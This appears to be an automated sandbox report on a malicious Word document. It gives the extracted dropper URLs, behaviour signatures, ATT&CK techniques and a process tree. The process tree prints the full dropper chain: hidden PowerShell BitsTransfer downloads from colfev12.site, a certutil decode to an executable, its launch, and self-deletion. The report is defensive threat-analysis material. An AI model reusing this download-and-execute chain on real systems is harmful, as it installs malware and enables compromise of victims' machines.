Analysis

  • max time kernel
    143s
  • resource
    win10v191014
  • submitted
    05-12-2019 16:52

General

  • Target

    Docs_92ebafcc950619596e93a4215d05e6cb.doc

  • Sample

    191205-lskkescds6

  • SHA256

    94c241402910892dc472c95bec71350b2201bb0b3216b0ea988782af6a05c08a

Malware Config

Extracted

Language
ps1
Source
URLs
exe.dropper

http://colfev12.site/Bijka.dat

exe.dropper

http://colfev12.site/sfera.dat

exe.dropper

http://colfev12.site/oYWE.dat

Signatures

  • Modifies system certificate store 2 TTPs 4 IoCs
  • Checks system information in the registry 2 TTPs 2 IoCs

    System information is often read in order to detect sandboxing environments.

  • Enumerates system info in registry 2 TTPs 6 IoCs
  • Drops file in Windows directory 1 IoCs
  • Checks for installed software on the system 1 TTPs 65 IoCs
  • Suspicious use of WriteProcessMemory 6 IoCs
  • Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 5 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 1 IoCs
  • Checks processor information in registry 2 TTPs 3 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Suspicious use of AdjustPrivilegeToken 5 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Executes dropped EXE 2 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Program crash 1 IoCs
  • Runs ping.exe 1 TTPs 1 IoCs
  • Windows security modification 2 TTPs 2 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs

Processes

  • C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE
    "C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\Docs_92ebafcc950619596e93a4215d05e6cb.doc" /o ""
    1⤵
    • Suspicious use of SetWindowsHookEx
    • Suspicious behavior: AddClipboardFormatListener
    PID:4968
  • C:\Windows\system32\cmd.exe
    cmd /c powershell -windowstyle hidden -command Import-Module BitsTransfer; Start-BitsTransfer -Source http://colfev12.site/Bijka.dat,http://colfev12.site/sfera.dat,http://colfev12.site/oYWE.dat -Destination \"$env:TEMP\blow.exe\",\"$env:TEMP\dera\",\"$env:TEMP\oYWE.exe\" & certutil -decode %temp%\dera %temp%\dera.exe & powershell -windowstyle hidden -command Set-Location -Path \"$env:TEMP\"; Start-Process blow.exe -ArgumentList dera.exe
    1⤵
      PID:4056
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        powershell -windowstyle hidden -command Import-Module BitsTransfer; Start-BitsTransfer -Source http://colfev12.site/Bijka.dat,http://colfev12.site/sfera.dat,http://colfev12.site/oYWE.dat -Destination \"$env:TEMP\blow.exe\",\"$env:TEMP\dera\",\"$env:TEMP\oYWE.exe\"
        2⤵
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:4548
      • C:\Windows\system32\certutil.exe
        certutil -decode C:\Users\Admin\AppData\Local\Temp\dera C:\Users\Admin\AppData\Local\Temp\dera.exe
        2⤵
          PID:4100
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell -windowstyle hidden -command Set-Location -Path \"$env:TEMP\"; Start-Process blow.exe -ArgumentList dera.exe
          2⤵
          • Suspicious use of WriteProcessMemory
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:4260
          • C:\Users\Admin\AppData\Local\Temp\blow.exe
            "C:\Users\Admin\AppData\Local\Temp\blow.exe" dera.exe
            3⤵
            • Suspicious use of WriteProcessMemory
            • Suspicious behavior: EnumeratesProcesses
            • Executes dropped EXE
            • Suspicious use of SetThreadContext
            PID:4288
            • C:\Users\Admin\AppData\Local\Temp\blow.exe
              "C:\Users\Admin\AppData\Local\Temp\blow.exe"
              4⤵
              • Suspicious use of WriteProcessMemory
              • Suspicious use of NtSetInformationThreadHideFromDebugger
              • Executes dropped EXE
              PID:2496
              • C:\Windows\SysWOW64\cmd.exe
                "C:\Windows\system32\cmd.exe" /c ping 127.0.0.1 && del "C:\Users\Admin\AppData\Local\Temp\blow.exe"
                5⤵
                • Suspicious use of WriteProcessMemory
                PID:4848
                • C:\Windows\SysWOW64\PING.EXE
                  ping 127.0.0.1
                  6⤵
                  • Runs ping.exe
                  PID:768
              • C:\Windows\SysWOW64\WerFault.exe
                C:\Windows\SysWOW64\WerFault.exe -u -p 2496 -s 1352
                5⤵
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of AdjustPrivilegeToken
                • Program crash
                PID:4936
      • \??\c:\windows\system32\svchost.exe
        c:\windows\system32\svchost.exe -k netsvcs -s BITS
        1⤵
        • Drops file in Windows directory
        PID:4664
      • \??\c:\windows\system32\svchost.exe
        c:\windows\system32\svchost.exe -k localserviceandnoimpersonation -s SSDPSRV
        1⤵
          PID:4624
        • C:\Windows\system32\SppExtComObj.exe
          C:\Windows\system32\SppExtComObj.exe -Embedding
          1⤵
          • Suspicious use of WriteProcessMemory
          PID:1732
          • C:\Windows\System32\SLUI.exe
            "C:\Windows\System32\SLUI.exe" RuleId=eeba1977-569e-4571-b639-7623d8bfecc0;Action=AutoActivate;AppId=55c92734-d682-4d71-983e-d6ec3f16059f;SkuId=2de67392-b7a7-462a-b1ca-108dd189f588;NotificationInterval=1440;Trigger=TimerEvent
            2⤵
              PID:3796
          • C:\Windows\System32\svchost.exe
            C:\Windows\System32\svchost.exe -k WerSvcGroup
            1⤵
            • Suspicious use of WriteProcessMemory
            • Suspicious use of NtCreateUserProcessOtherParentProcess
            • Suspicious behavior: EnumeratesProcesses
            PID:3416
          • \??\c:\windows\system32\svchost.exe
            c:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s WdiSystemHost
            1⤵
              PID:4388
            • C:\Windows\system32\svchost.exe
              C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s PcaSvc
              1⤵
                PID:3792
              • \??\c:\windows\system32\svchost.exe
                c:\windows\system32\svchost.exe -k netsvcs -s wlidsvc
                1⤵
                  PID:668
                • \??\c:\windows\system32\svchost.exe
                  c:\windows\system32\svchost.exe -k netsvcs -s wisvc
                  1⤵
                    PID:388
                  • \??\c:\windows\system32\svchost.exe
                    c:\windows\system32\svchost.exe -k netsvcs -s DoSvc
                    1⤵
                      PID:1900
                    • \??\c:\windows\system32\svchost.exe
                      c:\windows\system32\svchost.exe -k unistacksvcgroup
                      1⤵
                        PID:2708
                      • \??\c:\windows\system32\svchost.exe
                        c:\windows\system32\svchost.exe -k localservicenetworkrestricted -s wscsvc
                        1⤵
                          PID:4896

                        Network

                        MITRE ATT&CK Matrix ATT&CK v6

                        Defense Evasion

                        Install Root Certificate

                        1
                        T1130

                        Modify Registry

                        2
                        T1112

                        Disabling Security Tools

                        1
                        T1089

                        Discovery

                        Query Registry

                        4
                        T1012

                        System Information Discovery

                        3
                        T1082

                        Remote System Discovery

                        1
                        T1018

                        Replay Monitor

                        Loading Replay Monitor...

                        Downloads

                        • C:\ProgramData\Microsoft\Windows\WER\Temp\WER33DC.tmp.csv
                        • C:\ProgramData\Microsoft\Windows\WER\Temp\WER33FC.tmp.txt
                        • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
                        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                        • C:\Users\Admin\AppData\Local\Temp\blow.exe
                        • C:\Users\Admin\AppData\Local\Temp\blow.exe
                        • C:\Users\Admin\AppData\Local\Temp\blow.exe
                        • C:\Users\Admin\AppData\Local\Temp\dera
                        • C:\Users\Admin\AppData\Local\Temp\dera.exe
                        • C:\Users\Admin\AppData\Local\Temp\oYWE.exe
                        • memory/2496-10-0x0000000001150000-0x00000000011AD000-memory.dmp
                          Filesize

                          372KB

                        • memory/2496-12-0x0000000001150000-0x00000000011AD000-memory.dmp
                          Filesize

                          372KB

                        • memory/4936-16-0x0000000004CF0000-0x0000000004CF1000-memory.dmp
                          Filesize

                          4KB

                        • memory/4936-17-0x00000000058F0000-0x00000000058F1000-memory.dmp
                          Filesize

                          4KB

                        • memory/4936-18-0x00000000058F0000-0x00000000058F1000-memory.dmp
                          Filesize

                          4KB

                        • memory/4936-20-0x00000000058F0000-0x00000000058F1000-memory.dmp
                          Filesize

                          4KB

                        • memory/4936-22-0x00000000058F0000-0x00000000058F1000-memory.dmp
                          Filesize

                          4KB

                        • memory/4936-24-0x00000000058F0000-0x00000000058F1000-memory.dmp
                          Filesize

                          4KB

                        • memory/4936-26-0x00000000058F0000-0x00000000058F1000-memory.dmp
                          Filesize

                          4KB

                        • memory/4936-28-0x00000000058F0000-0x00000000058F1000-memory.dmp
                          Filesize

                          4KB

                        • memory/4936-30-0x00000000058F0000-0x00000000058F1000-memory.dmp
                          Filesize

                          4KB

                        • memory/4936-32-0x00000000058F0000-0x00000000058F1000-memory.dmp
                          Filesize

                          4KB

                        • memory/4936-34-0x00000000058F0000-0x00000000058F1000-memory.dmp
                          Filesize

                          4KB

                        • memory/4936-36-0x00000000058F0000-0x00000000058F1000-memory.dmp
                          Filesize

                          4KB

                        • memory/4936-38-0x00000000058F0000-0x00000000058F1000-memory.dmp
                          Filesize

                          4KB

                        • memory/4936-40-0x00000000058F0000-0x00000000058F1000-memory.dmp
                          Filesize

                          4KB

                        • memory/4936-42-0x00000000058F0000-0x00000000058F1000-memory.dmp
                          Filesize

                          4KB

                        • memory/4936-44-0x00000000058F0000-0x00000000058F1000-memory.dmp
                          Filesize

                          4KB

                        • memory/4936-46-0x00000000058F0000-0x00000000058F1000-memory.dmp
                          Filesize

                          4KB

                        • memory/4936-48-0x00000000058F0000-0x00000000058F1000-memory.dmp
                          Filesize

                          4KB

                        • memory/4936-50-0x00000000058F0000-0x00000000058F1000-memory.dmp
                          Filesize

                          4KB

                        • memory/4936-51-0x00000000058F0000-0x00000000058F1000-memory.dmp
                          Filesize

                          4KB

                        • memory/4936-53-0x00000000058F0000-0x00000000058F1000-memory.dmp
                          Filesize

                          4KB

                        • memory/4936-54-0x00000000058F0000-0x00000000058F1000-memory.dmp
                          Filesize

                          4KB

                        • memory/4936-55-0x00000000058F0000-0x00000000058F1000-memory.dmp
                          Filesize

                          4KB

                        • memory/4936-56-0x00000000058F0000-0x00000000058F1000-memory.dmp
                          Filesize

                          4KB

                        • memory/4936-58-0x00000000058F0000-0x00000000058F1000-memory.dmp
                          Filesize

                          4KB

                        • memory/4936-59-0x00000000058F0000-0x00000000058F1000-memory.dmp
                          Filesize

                          4KB

                        • memory/4936-61-0x00000000058F0000-0x00000000058F1000-memory.dmp
                          Filesize

                          4KB

                        • memory/4936-62-0x0000000005CF0000-0x0000000005CF1000-memory.dmp
                          Filesize

                          4KB

                        • memory/4936-63-0x00000000058F0000-0x00000000058F1000-memory.dmp
                          Filesize

                          4KB

                        • memory/4936-66-0x00000000058F0000-0x00000000058F1000-memory.dmp
                          Filesize

                          4KB

                        • memory/4936-67-0x00000000058F0000-0x00000000058F1000-memory.dmp
                          Filesize

                          4KB

                        • memory/4936-70-0x00000000058F0000-0x00000000058F1000-memory.dmp
                          Filesize

                          4KB

                        • memory/4936-72-0x0000000003470000-0x0000000003471000-memory.dmp
                          Filesize

                          4KB

                        • memory/4936-73-0x00000000058D0000-0x00000000058D1000-memory.dmp
                          Filesize

                          4KB

                        • memory/4936-74-0x0000000003470000-0x0000000003471000-memory.dmp
                          Filesize

                          4KB

                        • memory/4936-75-0x0000000003470000-0x0000000003471000-memory.dmp
                          Filesize

                          4KB

                        • memory/4936-76-0x0000000003470000-0x0000000003471000-memory.dmp
                          Filesize

                          4KB

                        • memory/4936-77-0x0000000003470000-0x0000000003471000-memory.dmp
                          Filesize

                          4KB

                        • memory/4936-78-0x0000000003470000-0x0000000003471000-memory.dmp
                          Filesize

                          4KB

                        • memory/4936-79-0x0000000003470000-0x0000000003471000-memory.dmp
                          Filesize

                          4KB

                        • memory/4936-80-0x0000000003470000-0x0000000003471000-memory.dmp
                          Filesize

                          4KB

                        • memory/4936-81-0x0000000003470000-0x0000000003471000-memory.dmp
                          Filesize

                          4KB

                        • memory/4936-82-0x0000000003470000-0x0000000003471000-memory.dmp
                          Filesize

                          4KB

                        • memory/4936-83-0x0000000003470000-0x0000000003471000-memory.dmp
                          Filesize

                          4KB

                        • memory/4936-84-0x0000000003470000-0x0000000003471000-memory.dmp
                          Filesize

                          4KB

                        • memory/4936-85-0x0000000003470000-0x0000000003471000-memory.dmp
                          Filesize

                          4KB

                        • memory/4936-87-0x0000000003470000-0x0000000003471000-memory.dmp
                          Filesize

                          4KB

                        • memory/4936-86-0x0000000003470000-0x0000000003471000-memory.dmp
                          Filesize

                          4KB

                        • memory/4936-88-0x0000000003470000-0x0000000003471000-memory.dmp
                          Filesize

                          4KB

                        • memory/4936-89-0x0000000003470000-0x0000000003471000-memory.dmp
                          Filesize

                          4KB

                        • memory/4936-90-0x0000000003470000-0x0000000003471000-memory.dmp
                          Filesize

                          4KB

                        • memory/4936-91-0x0000000003470000-0x0000000003471000-memory.dmp
                          Filesize

                          4KB

                        • memory/4936-92-0x0000000003470000-0x0000000003471000-memory.dmp
                          Filesize

                          4KB

                        • memory/4936-93-0x0000000003470000-0x0000000003471000-memory.dmp
                          Filesize

                          4KB

                        • memory/4936-94-0x0000000003470000-0x0000000003471000-memory.dmp
                          Filesize

                          4KB

                        • memory/4936-95-0x0000000003470000-0x0000000003471000-memory.dmp
                          Filesize

                          4KB

                        • memory/4936-96-0x0000000003470000-0x0000000003471000-memory.dmp
                          Filesize

                          4KB

                        • memory/4936-97-0x0000000003470000-0x0000000003471000-memory.dmp
                          Filesize

                          4KB

                        • memory/4936-98-0x0000000003470000-0x0000000003471000-memory.dmp
                          Filesize

                          4KB

                        • memory/4936-99-0x0000000003470000-0x0000000003471000-memory.dmp
                          Filesize

                          4KB

                        • memory/4936-100-0x0000000003470000-0x0000000003471000-memory.dmp
                          Filesize

                          4KB

                        • memory/4936-101-0x0000000003470000-0x0000000003471000-memory.dmp
                          Filesize

                          4KB

                        • memory/4936-102-0x0000000003470000-0x0000000003471000-memory.dmp
                          Filesize

                          4KB

                        • memory/4936-103-0x0000000003470000-0x0000000003471000-memory.dmp
                          Filesize

                          4KB

                        • memory/4936-104-0x0000000003470000-0x0000000003471000-memory.dmp
                          Filesize

                          4KB

                        • memory/4936-105-0x0000000003470000-0x0000000003471000-memory.dmp
                          Filesize

                          4KB

                        • memory/4936-106-0x0000000003470000-0x0000000003471000-memory.dmp
                          Filesize

                          4KB

                        • memory/4936-107-0x0000000003470000-0x0000000003471000-memory.dmp
                          Filesize

                          4KB

                        • memory/4936-108-0x0000000003470000-0x0000000003471000-memory.dmp
                          Filesize

                          4KB

                        • memory/4936-109-0x0000000003470000-0x0000000003471000-memory.dmp
                          Filesize

                          4KB

                        • memory/4936-110-0x0000000003470000-0x0000000003471000-memory.dmp
                          Filesize

                          4KB

                        • memory/4936-111-0x0000000003470000-0x0000000003471000-memory.dmp
                          Filesize

                          4KB

                        • memory/4936-112-0x0000000003470000-0x0000000003471000-memory.dmp
                          Filesize

                          4KB

                        • memory/4936-113-0x0000000003470000-0x0000000003471000-memory.dmp
                          Filesize

                          4KB

                        • memory/4936-114-0x0000000003470000-0x0000000003471000-memory.dmp
                          Filesize

                          4KB

                        • memory/4936-115-0x0000000003470000-0x0000000003471000-memory.dmp
                          Filesize

                          4KB

                        • memory/4936-116-0x0000000003470000-0x0000000003471000-memory.dmp
                          Filesize

                          4KB

                        • memory/4936-117-0x0000000003470000-0x0000000003471000-memory.dmp
                          Filesize

                          4KB

                        • memory/4936-118-0x0000000003470000-0x0000000003471000-memory.dmp
                          Filesize

                          4KB

                        • memory/4936-119-0x0000000003470000-0x0000000003471000-memory.dmp
                          Filesize

                          4KB

                        • memory/4936-120-0x0000000003470000-0x0000000003471000-memory.dmp
                          Filesize

                          4KB

                        • memory/4936-121-0x0000000003470000-0x0000000003471000-memory.dmp
                          Filesize

                          4KB

                        • memory/4936-122-0x0000000003470000-0x0000000003471000-memory.dmp
                          Filesize

                          4KB

                        • memory/4936-123-0x0000000003470000-0x0000000003471000-memory.dmp
                          Filesize

                          4KB

                        • memory/4936-124-0x0000000003470000-0x0000000003471000-memory.dmp
                          Filesize

                          4KB

                        • memory/4936-125-0x0000000003470000-0x0000000003471000-memory.dmp
                          Filesize

                          4KB

                        • memory/4936-126-0x0000000003470000-0x0000000003471000-memory.dmp
                          Filesize

                          4KB

                        • memory/4936-127-0x0000000003470000-0x0000000003471000-memory.dmp
                          Filesize

                          4KB

                        • memory/4936-128-0x0000000003470000-0x0000000003471000-memory.dmp
                          Filesize

                          4KB

                        • memory/4936-129-0x0000000003470000-0x0000000003471000-memory.dmp
                          Filesize

                          4KB

                        • memory/4936-130-0x0000000003470000-0x0000000003471000-memory.dmp
                          Filesize

                          4KB

                        • memory/4936-131-0x0000000003470000-0x0000000003471000-memory.dmp
                          Filesize

                          4KB

                        • memory/4936-136-0x0000000005CD0000-0x0000000005CD1000-memory.dmp
                          Filesize

                          4KB